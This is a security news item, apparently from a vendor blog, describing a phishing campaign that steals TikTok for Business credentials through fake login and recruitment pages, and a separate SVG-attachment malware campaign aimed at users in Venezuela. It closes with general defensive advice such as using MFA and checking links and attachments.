Attackers are targeting TikTok for Business accounts in a new phishing campaign.

According to Push Security, the campaign begins with victims clicking on a fake link. This link redirects the user either to a page mimicking TikTok for Business or a fake recruitment page similar to Google Careers. In some scenarios, the victim is also offered the option to schedule an interview for a supposed job opportunity. The goal is to gain the user's trust and capture their login credentials.

One of the notable aspects of the campaign is the attackers' use of Cloudflare Turnstile verification on their pages. This method makes it difficult for security tools, bots, and automated scanning systems to easily analyze the malicious content. Once the user passes the verification, they are presented with an AitM (adversary-in-the-middle) phishing page that closely resembles the real login screen. The username, password, and session information entered on this page can fall directly into the hands of the attackers.

Compromised business-type social media accounts are highly valuable to attackers. This is because these accounts can later be used to run fake advertising campaigns, spread malicious links, distribute malware, or deceive more people by leveraging the existing account's credibility. Push Security notes that the TikTok platform has been abused in the past with social engineering content for the distribution of malware such as Vidar, StealC, and Aura Stealer.

The news also draws attention to a different campaign. In this second attack chain, targets, especially users in Venezuela, are sent files with the SVG extension disguised as invoices, receipts, or price quotes. According to WatchGuard, when these SVG files are opened, communication is established with a malicious link in the background, and malware is downloaded onto the device. The downloaded malware is reported to be a Go-based malware bearing similarities to samples previously associated with the BianLian ransomware.

In summary, these two examples show that attackers are now carrying out much more convincing attacks not only with fake domains but also through legitimate-looking pages, anti-bot controls, and seemingly harmless file types. Therefore, especially for business accounts, carefully checking the source of links, using multi-factor authentication, and verifying before opening unexpected attachments are of great importance.

Some of the precautions we need to take to protect against these types of attacks include:

• Do not open emails from untrusted sources.

• Use multi-factor authentication (MFA).

• Keep your system updated to the latest version at all times.

• Monitor login logs regularly.

• Track the security of mobile devices.

  
  
  
  
  
  

For detailed information, you can reach out to our experts at info@zerosecond.com.ae